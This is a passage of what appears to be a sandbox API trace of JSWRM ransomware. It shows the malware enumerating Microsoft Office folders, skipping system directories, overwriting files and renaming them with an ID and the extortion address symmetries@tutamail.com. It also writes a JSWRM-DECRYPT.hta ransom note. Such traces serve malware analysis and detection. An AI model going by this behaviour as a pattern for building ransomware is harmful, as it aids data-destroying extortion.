lpFileSize=0x345e528*=18156) returned 1 [0120.856] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46e0) returned 0x24e1d8 [0120.856] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x46e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x46e0, lpOverlapped=0x0) returned 1 [0120.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.858] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x46e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x46e0, lpOverlapped=0x0) returned 1 [0120.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.912] CloseHandle (hObject=0x314) returned 1 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0120.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.914] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46ec, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR9F.GIF", cAlternateFileName="")) returned 0 [0120.914] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0120.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0120.914] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc79af6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc79af6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fc48, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PUBWZINT.DLL", cAlternateFileName="")) returned 1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2=".") returned 1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="..") returned 1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="...") returned 1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="windows") returned -1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="recovery") returned -1 [0120.914] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="perflogs") returned 1 [0120.915] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="documents and settings") returned 1 [0120.915] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0120.915] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="system volume information") returned -1 [0120.915] lstrcmpiW (lpString1="PUBWZINT.DLL", lpString2="msocache") returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.DLL", lpUsedDefaultChar=0x0) returned 12 [0120.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.DLL", lpUsedDefaultChar=0x0) returned 12 [0120.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0120.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0120.915] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf46b8986, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf46b8986, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="QRYINT32.DLL", cAlternateFileName="")) returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2=".") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="..") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="...") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="windows") returned -1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="recovery") returned -1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="perflogs") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="documents and settings") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="system volume information") returned -1 [0120.915] lstrcmpiW (lpString1="QRYINT32.DLL", lpString2="msocache") returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRYINT32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRYINT32.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QRYINT32.DLL", lpUsedDefaultChar=0x0) returned 12 [0120.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRYINT32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRYINT32.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QRYINT32.DLL", lpUsedDefaultChar=0x0) returned 12 [0120.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0120.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0120.916] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="QuickStyles", cAlternateFileName="QUICKS~1")) returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2=".") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="..") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="...") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="windows") returned -1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="recovery") returned -1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="perflogs") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="documents and settings") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="$RECYCLE.BIN") returned 1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="system volume information") returned -1 [0120.916] lstrcmpiW (lpString1="QuickStyles", lpString2="msocache") returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0120.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0120.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0120.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0120.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0120.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\jswrm-decrypt.hta")) returned 0xffffffff [0120.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0120.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0120.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0120.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0120.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0120.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0120.923] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.924] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0120.924] CloseHandle (hObject=0x238) returned 1 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0120.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\jswrm-decrypt.hta")) returned 0x20 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0120.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0120.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0120.925] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ebd8eb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0120.925] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0120.925] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ebd8eb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0120.925] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0120.925] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0120.925] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f51, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="basicelegant.dotx", cAlternateFileName="BASICE~1.DOT")) returned 1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2=".") returned 1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="..") returned 1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="...") returned 1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="windows") returned -1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="recovery") returned -1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="perflogs") returned -1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="documents and settings") returned -1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.925] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="system volume information") returned -1 [0120.926] lstrcmpiW (lpString1="basicelegant.dotx", lpString2="msocache") returned -1 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicelegant.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicelegant.dotx", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicelegant.dotx", lpUsedDefaultChar=0x0) returned 17 [0120.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicelegant.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicelegant.dotx", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicelegant.dotx", lpUsedDefaultChar=0x0) returned 17 [0120.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0120.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0120.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicelegant.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicelegant.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.927] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12113) returned 1 [0120.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f50) returned 0x24e1d8 [0120.927] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f50, lpOverlapped=0x0) returned 1 [0120.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.929] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f50, lpOverlapped=0x0) returned 1 [0120.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.929] CloseHandle (hObject=0x314) returned 1 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0120.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0120.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0120.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0120.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0120.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.929] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicelegant.dotx" (normalized: "c:\\program files\\microsoft 